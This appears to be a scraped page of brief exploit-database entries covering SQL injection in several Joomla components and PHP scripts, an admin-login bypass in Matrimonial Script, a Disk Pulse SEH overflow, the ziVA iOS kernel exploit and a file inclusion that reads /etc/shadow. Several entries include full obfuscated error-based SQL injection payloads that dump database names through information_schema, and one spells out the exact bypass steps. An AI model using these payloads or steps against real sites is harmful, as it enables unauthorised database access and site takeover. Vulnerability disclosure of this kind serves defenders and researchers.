An Attackers are able to completely compromise the web application built upon Matrimonial Script as they can gain access to the admin panel and manage the website as an admin without prior authentication. To exploit this vulnerability, an attacker can create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php and access http://example.com/path/admin/index.php.
The vulnerability allows an attacker to inject sql commands into the vulnerable application. Proof of Concept: http://localhost/[PATH]/index.php?option=com_pofos&view=pofo&id=[SQL]
The vulnerability allows an attacker to inject sql commands.... Proof of Concept: http://localhost/[PATH]/photo-contest/photocontest/vote?controller=photocontest&vid=[SQL] 1'aND+(/*!22200sEleCT*/+1+/*!22200FrOM*/+(/*!22200sEleCT*/+cOUNT(*),/*!22200CoNCAt*/((/*!22200sEleCT*/(/*!22200sEleCT*/+/*!22200CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!22200FrOM*/+infOrMation_schEma.tables+where+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!22200FrOM*/+infOrMation_schEma.tABLES+/*!22200gROUP*/+bY+x)a)+aND+''='
Auto Car - Car listing Script 1.1 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the 'category' parameter in the 'search-cars' page. This can be exploited to dump the database contents, including the usernames, passwords, first and last names, and emails of the users.
The vulnerability allows an attacker to inject sql commands.... Proof of Concept: http://localhost/[PATH]/index.php?option=com_osdownloads&view=item&id=[SQL] 8+aND(/*!22200sELeCT*/+0x30783331+/*!22200FrOM*/+(/*!22200SeLeCT*/+cOUNT(*),/*!22200CoNCaT*/((sELEcT(sELECT+/*!22200CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
Disk Pulse Enterprise is vulnerable to a remote SEH buffer overflow vulnerability. An attacker can exploit this vulnerability by sending a specially crafted payload to the vulnerable server on port 8080. This payload contains a malicious code which will be executed on the target system.
ziVA is an iOS kernel exploit designated to work on all 64-bit iOS devices <= 10.3.1. It requires offsets for each iOS device and version, which can be acquired from AppleAVEDriver. Sandbox escape exploits have been released by P0, which means this can be used to completely compromise a kernel, and a step towards a full jailbreak. It is a crucial part in a Jailbreak chain, but this never aimed to become a Jailbreak.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?option=com_price_alert&view=subscribeajax&task=pricealert_ajax&product_id=[SQL] 64+aND(/*!11100sELeCT*/+0x30783331+/*!11100FrOM*/+(/*!11100SeLeCT*/+cOUNT(*),/*!11100CoNCaT*/((sELEcT(sELECT+/*!11100CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+AND+1=1
The vulnerability allows an attacker to inject sql commands into the vulnerable parameter 'product_id' of the component Bargain Product VM3 1.0. Proof of concept is provided in the text.
The 'getpage' HTTP parameter is not escaped in include file, which allows attackers to include local files with a root privilege user, such as /etc/password, /etc/shadow, etc.
Services By CQR